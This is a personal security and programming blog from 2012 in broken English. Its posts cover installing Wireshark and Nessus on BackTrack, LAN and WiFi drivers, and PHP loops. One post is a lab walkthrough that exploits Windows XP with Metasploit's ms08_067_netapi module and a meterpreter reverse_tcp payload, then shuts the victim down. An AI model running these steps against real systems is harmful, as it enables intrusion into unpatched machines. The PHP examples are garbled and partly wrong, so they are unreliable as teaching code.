Friday, March 30, 2012

how to install wireshark in ubuntu/backtrack

hello guest, to day i will share about how to install wireshark in the linux/unix, actually this for remember me how to install wireshark, so i post in my blog me scared if i forget,  if i will install wireshark in my laptop next time. ok enough to bla....bla....bla.....!!

following how to install wireshark :

#sudo add-apt-repository ppa:n-muench/programs-ppa

#sudo apt-get update

#sudo apt-get install wireshark

Thursday, March 29, 2012

exploit windows xp with backtrack 5 in virtual machine person

to day i will posting about how to exploit windows xp 2 with backtrack 5 in virtual machine,
ok first you have to install backtrack 5, and install virtualbox in your back track 5, and in the virtualbox you install windows xp 2 for victims in your experiment, ok look the pictures, and i will try to explain that i know how basic from exploit win xp 2, in your laboratorium personal, ok follow this pictures,

Open your virtualbox and Open or start your win xp to be a victims, fom your exploit.


Ok, pictures in under your win xp already to acces,
And then open your console and type msfconasole and witting  until show the pictures that signal to beginning exploit that. like this pictures.

if you finish to waiting you will look like this in under pictures.

and then you have to type use exploit/windows/smb/ms08_067_netapi and click enter. type show options, and then type set RHOS your ip target my ip target is 192.168.56.5 soo i have to type
set RHOS 192.168.56.5 enter, you will see like this under pictures.

and then type show option to make sure that you set is RHOS not other.
next you type show payloads and you will look many some payloads, and the you have to type
commands set PAYLOADS windows/meterppreter/reverse_tcp and enter. you will looks, like this under captures, and then type show option, you will looks, who you will to take or set the LHOS or your ip adresss in vmnet0,


if you success until this step,
you ready to looks specific target you have to type show target , and you can set target may target spesific is number 3 so i have to type set TARGET 3 , in this step you can to not input or to set target, no ok,
and then type exploit and if you success you will come in the system from window xp target, you can doing anything in the victim in exemple i will shutdown the victims,


ok type shell and you will come in the system type cd .. untill in system c:\ and then type shutdown -s -t 07 -c "i kill you victims" try guest to known what happen about that thanks.

Tuesday, March 20, 2012

wireshark

WIRESHARK is free packet analyzer and open source this device use for network solve, analysis, software and floating protocol communicate and education initially named Ethereal, on may 2006 this project name change WIRESHARK because trademark.

FUNCTION AND USEFULLY

WIRESHARK is a one of so many tools network analyzer most use by network administrator to analyzer performance network including in it protocol. WIRESHARK many preferred because interface that use graphical user interface (GUI), or view graphic.

WIRESHARK capable capture packets data or information that fro on the network.
All type packet information in various format, protocol will easily to capture too, and analyzer therefore not infrequently this tools also can use to sniffing.

HOW TO INSTALL NESSUS IN BACKTRACK 5

TO DAY I WILL WRITE ABOUT HOW TO INSTALL NESSUS IN BACKTRACK 5

NESSUS a one of scanner network security that use by administrator system. role NESSUS a to security audit a system.
like vulnerability,
misconfiguration,
security path that not yet to application,
default password, and
denial of service.
NESSUS functions to monitoring a network traffic.

Audit NESSUS as follows :

* credentialed and un-credentialed port scanning
* network based vulnerability scanning
* credentialed based patch audits for Windows and most UNIX platforms
* credentialed configuration auditing of most Windows and UNIX platforms
* robust and comprehensive credentialed security testing of 3rd party applications
* custom and embedded web application vulnerability testing
* SQL database configuration auditing
* software enumeration on Unix and Windows
* testing anti-virus installs for out-of date signatures and configuration errors


features that NESSUS have:
1. plug-in architecture.
each security test write as external plugin. white features like this, we can white easily add test that we want without to read from engine NESSUS code.
2. NASL (Nessus attack scripting Language)
NASL is a language that to design for write program security test white easily and fast. in addition to NASL, c language also can use to write program security test.
3. UP-TO Date security vulnerability database.
4.client-server architecture
NESSUS security scanner consist from two sections that is:
a server that function as actor attack, and a client that functions frontend.client and server can run on the system that different. meaning from this feature is that whole network can to audit through a PC, white server that doing attack to network target.
5. can to testing value many host in the tie that same.
6.smart service recognation.
NESSUS not believe host that target use standard port that determinate by IANA. this meaning NESSUS can know a web server that running on the port that not a standard port (exaple in port 8080), or a FTP server that running on port 31337.
7. multiple services
when are two web server on host targets then NESSUS will testing both the web server.
8. Complete report
NESSUS not only give known weakness from network target but also to give way that can to use to prevent the bad guy to exploits weakness from network and also give level risk from a problem that found.

Ok now I will sharing how to download and install NESSUS.
DOWNLOADS NESSUS http://www.nessus.org/products/nessus/select-your-operating-system

And Install NESSUS
entry in file where NESSUS saved use the console use command

root@bt:~/Downloads#dpkg -i Nessus-4.4.1-debian5_i386.deb
root@bt:~/Downloads# cd /opt/nessus/sbin/
root@bt:/opt/nessus/sbin# nessus-adduser
Login : flyjob9
Login password :
Login password (again) :
Do you want this user to be a Nessus ‘admin’ user ? (can upload plugins, etc…) (y/n) [n]: y
User rules
———-
nessusd has a rules system which allows you to restrict the hosts
that flyjob9 has the right to test. For instance, you may want
him to be able to scan his own host only.

Please see the nessus-adduser manual for the rules syntax

Enter the rules for this user, and enter a BLANK LINE once you are done :
(the user can have an empty rules set)

Login : flyjob9
Password : ***********
This user will have ‘admin’ privileges within the Nessus server
Rules :
Is that ok ? (y/n) [y] y
User added


when the step above finish whit perfect white end value user additions, further we to registration.

ways to register
entry to this link

http://www.nessus.org/products/nessus/select-your-operating-system

above link a where we downloaded NESSUS)

click AGREE

and then

click link here on to use NESSUS, you net activation code. Obtain one here. will display options like a.

Using NESSUS at work?
Using NESSUS at HOME?

on this tutorial will choice Using Nessus at Home? an dclick select.

then will directed in page thank you for register ! then register and was success.
and then open email NESSUS will sent activation your account.
and then back to the console root@bt:/# /opt/nessus/bin/nessus-fetch –register “id yang di berikan oleh nessus” enter

Your activation code has been registered properly – thank you.
Now fetching the newest plugin set from plugins.nessus.org…
Your Nessus installation is now up-to-date.
If auto_update is set to ‘yes’ in nessusd.conf, Nessus will
update the plugins by itself.

root@bt:/# /etc/init.d/nessusd start
Starting Nessus : .

root@bt:/# netstat -ntpl
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:8834 0.0.0.0:* LISTEN 3438/nessusd
tcp 0 0 127.0.0.1:7175 0.0.0.0:* LISTEN 1276/postgres
tcp 0 0 0.0.0.0:1241 0.0.0.0:* LISTEN 3438/nessusd
tcp 0 0 127.0.0.1:46201 0.0.0.0:* LISTEN 1861/python
tcp6 0 0 ::1:7175 :::* LISTEN 1276/postgres
tcp6 0 0 :::1241 :::* LISTEN

if up here success then open tour browser and type url

http://localhost:8834

then will display page

this connection is Unstrusted

click

I understand the risk - click add exaption
-confirm security exeption then will display login page NESSUS.

login using id and password was registered.

NESUS

TO DAY I WILL WRITE ABOUT NESSUS IN MY BLOG...

OK NESSUS a vulnerability project scanner most popular more than 75000 the big company in the all around the world.
many used in the large company in the world to aplications audit and they company business system that a secret.


the features between others UP-TO DATE SECURITY VULNERABILITY DATA BASE, NASL plugin,report security that complete, full to supported SSL, and multiple service.
report security system that to produced by NESSUS was scanner the his system targets really complete, in addition contain the gap security that there are in the one system and risk security that possible to doing, and this report also contains solution how to closed a taht gap security almost all OS can to be target scanning.

Sunday, March 18, 2012

how to downloads and install driver ALL LAN and WIFI

Ok to day i will show you about how to overcome your computer that use OS backtrack 5 and have problem about driver LAN and your WIFI same whit my computer my WIFI not active because i have a problem white my driver my WLAN0 nathing driver to conect the WIFI, i feel dizziness in her.

OK first you havto downloads driver LAN and WIFI in this link :http://www.softpedia.com/get/System/OS-Enhancements/3DP-Net.shtml. time i write this articles i'm not yet to tried downloads because i was upgrade my wine in my OS i'm Using backtrack 5, http://www.blogger.com/post-create.g?blogID=4233192678118788713

after admission link abouve, click button downloads and then choice one of link donloads in right
page. and driver will otomatical to downloads, this driver name is 3DP NET. Downloads this driver LAN and WIFI you only do just once and after that you can use that in ofline whitout the internet.

for install driver LAN or WIFI you can double click on the file result of earlie downloads then file will extrack by it self following this screenshoot :













and then click driver to install your driver LAN if you want to install driver WIFI you can click sign + in right it woult appear driver WIFI and then just click driver to install driver WIFI.

click next to install driver and waiting fproccess untill finish.

Driver alredy instaled and ready to use.

good luck......!!!!!!!!!

interation in PHP

Hello guest, how are you to day ok this encounter i will try posting about interation in PHP,
good listening....

Ok usually in write blog kode we often write kode that same in repeatedly, interation be used to overcome problem that in PHP there is some type interation that can use taht is :

- while is interation bloc code white conditions true.
- do....while is doing interation just once.
- for is interesting vloc code white s contain number.
- foreach is interation in each array element.

for example and you can try it in your computer i hope so, if you want to master try of the small.

Ok,

interation while

==php
$i = 2 ;
while($i<=5) { echo "the number is . $i . " $i++; } = Ok, i have tried above PHP program and success but my computer jammed becouse that program not stoped probably because i put value $i++ that is value +1 and program always run. Interation Do......While ==php $i = 1 ; do { $++; echo " this number is .$i. "; } while ($i<=5); = Oops.. i think my computer will jammed again in fact no jammed again why please help me to explain that because you my friends sirry i'm just newbie and i'm not master i hop you smarter than me Ok, i hope so. Ok we go again... interation For ==php for ($i=1; $i<=5; $i++) { echo " this number is .$i. "; } = i like this i'm tried and there is bit error and i can fine where the fault lessin fact i note put value on variable $i=.blank. previous and i'm tried put $i=1; in turn out success. Ok we go again trying to programming. interation foreach. ==php $x=array("one","two","three"); foreach($x as $value) { echo $value." "; } = in fact i will swo you comparison between using foreach and for because i not success trying that i'm sorry about that. Ok thank's to visite my blog and i will say thank you very much and i'm very sorry may english language not good i'm still learning to date. thanks guest........ conngratulations to master for you to rule the world and live better be programer PHP see you next time....... information : ==PHP you can change white tag ""